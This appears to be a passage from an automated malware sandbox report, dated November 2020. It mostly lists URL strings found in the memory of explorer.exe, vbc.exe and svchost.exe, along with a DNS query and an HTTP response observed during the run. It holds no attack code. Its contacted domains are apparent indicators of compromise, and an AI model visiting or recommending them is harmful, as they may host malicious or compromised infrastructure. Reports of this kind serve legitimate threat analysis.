            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: www.myecovet.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Nov 2020 20:23:47 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.penrosecondos-official.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2Connection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2155629669.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000006.00000000.2152827902.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000006.00000000.2152827902.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000006.00000002.2350497797.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: vbc.exe, 00000004.00000002.2139033957.000000000239E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000006.00000000.2156053333.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000006.00000000.2152827902.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000006.00000000.2155629669.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: explorer.exe, 00000006.00000000.2152827902.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.2164967581.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000006.00000002.2350497797.0000000001C70000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.2351481307.0000000004330000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
